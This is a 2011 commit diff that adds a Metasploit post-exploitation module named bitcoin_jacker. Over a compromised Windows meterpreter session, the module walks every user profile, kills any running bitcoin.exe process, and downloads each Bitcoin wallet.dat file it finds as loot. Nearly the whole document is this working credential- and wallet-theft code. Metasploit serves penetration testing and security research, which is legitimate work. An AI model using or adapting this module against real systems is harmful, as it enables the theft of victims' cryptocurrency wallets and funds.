This adds IllWill's Bitcoin waller.dat Post module

git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da
2011-06-21 03:26:07 +00:00 · 2011-06-21 03:26:07 +00:00 · 18c8f8dbe2
parent fdbc038bd0
commit 18c8f8dbe2
1 changed files with 94 additions and 0 deletions
--- a/modules/post/windows/gather/bitcoin_jacker.rb
+++ b/modules/post/windows/gather/bitcoin_jacker.rb
@ -0,0 +1,94 @@
+# $Id$
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+
+
+class Metasploit3 < Msf::Post
+	include Msf::Auxiliary::Report
+
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'Windows Gather Bitcoin wallet.dat',
+				'Description'   => %q{ This module downloads any Bitcoin wallet.dat files from the target system},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'illwill <illwill@illmob.org>'],
+				'Version'       => '$Revision$',
+				'Platform'      => [ 'windows' ],
+				'SessionTypes'  => [ 'meterpreter' ]
+			))
+	end
+
+	def run
+		print_status("Checking All Users For Bitcoin Wallet...")
+		os = session.sys.config.sysinfo['OS']
+		drive = session.fs.file.expand_path("%SystemDrive%")
+
+		if os =~ /Windows 7|Vista|2008/
+			@appdata = '\\AppData\\Roaming\\'
+			@users = drive + '\\Users'
+		else
+			@appdata = '\\Application Data\\'
+			@users = drive + '\\Documents and Settings'
+		end
+
+		get_users
+		
+		@userpaths.each do |path|
+			jack_wallet(path)
+		end
+	end
+
+	def jack_wallet(path)
+		data     = ""
+		filename = "#{path}#{@appdata}\\Bitcoin\\wallet.dat"
+		found    = client.fs.file.stat(filename) rescue nil
+		return if not found
+		
+		print_status("Wallet Found At #{filename}")
+		print_status("     Jackin their wallet...")
+			
+		kill_bitcoin
+		
+		begin
+			wallet = session.fs.file.new(filename, "rb")
+			until wallet.eof?
+				data << wallet.read
+ 			end
+			
+			store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
+			print_status("     Wallet Jacked.")
+		rescue ::Interrupt 
+			raise $!
+		rescue ::Exception => e
+			print_error("Failed to download #{filename}: #{e.class} #{e}")	
+		end
+	end
+
+	def get_users
+		@userpaths = []
+		session.fs.dir.foreach(@users) do |path|
+			next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
+			@userpaths << "#{@users}\\#{path}\\"
+		end
+	end
+	
+		
+	def kill_bitcoin
+		client.sys.process.get_processes().each do |x|
+			if x['name'].downcase == "bitcoin.exe"
+				print_status("     #{x['name']} Process Found...")
+				print_status("     Killing Process ID #{x['pid']}...")
+				session.sys.process.kill(x['pid']) rescue nil
+			end
+		end
+	end
+
+end